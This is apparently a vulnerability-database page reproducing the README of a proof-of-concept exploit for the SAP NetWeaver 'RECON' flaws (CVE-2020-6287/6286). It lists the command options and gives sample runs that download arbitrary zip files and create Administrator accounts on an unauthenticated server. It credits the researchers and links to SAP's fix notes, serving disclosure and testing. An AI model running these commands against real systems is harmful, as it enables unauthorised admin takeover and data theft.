关联漏洞
标题:
SAP NetWeaver AS JAVA 授权问题漏洞
(CVE-2020-6287)
描述:SAP Netweaver是德国思爱普(SAP)公司的一套面向服务的集成化应用平台。该平台主要为SAP应用程序提供开发和运行环境。SAP NetWeaver Application Server(AS)Java是一款运行于NetWeaver中且基于Java编程语言的应用服务器。 SAP NetWeaver AS JAVA (LM Configuration Wizard)中存在授权问题漏洞,该漏洞源于程序未执行身份验证检查。攻击者可利用该漏洞执行配置任务,在SAP Java系统上执行重要操作,包括创建管理
描述
PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
介绍
PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
~~Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Guys, really? That was the best codename you came up with? :)~~
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in `queryProtocol` method.
Directory traversal allows to download any `zip` from SAP server.
***This project is created only for educational purposes and cannot be used for law violation or personal gain.
<br>The author of this project is not responsible for any possible harm caused by the materials of this project***
Original finding:
CVE-2020-6287: [Pablo Artuso](https://twitter.com/lmkalg)<br>
CVE-2020-6286: [Yvan 'iggy' G.](https://twitter.com/_1ggy)
Solution: [#2934135](https://launchpad.support.sap.com/#/notes/2934135), [#2939665](https://launchpad.support.sap.com/#/notes/2939665)
# How to use
Just point SAP NW AS Java hostnmae/ip.
There is additional options:
1. `-c` - check if SAP server is vulnerable to RECON
2. `-f` - download `zip` file from SAP server
3. `-u` - create user SAP JAVA user with `Authenticated User` role
4. `-a` - create user SAP JAVA user with `Administrator` role
Ex.: Download zip file
```
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
```
Ex.: Create SAP JAVA user
```
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
```
Ex.: Create SAP JAVA Administrator user
```
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
```
## All options
```
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode
```
文件快照
[4.0K] /data/pocs/95252b9abec1e9fdf8610d3fbeb7416f80252065
├── [3.2K] README.md
└── [9.7K] RECON.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。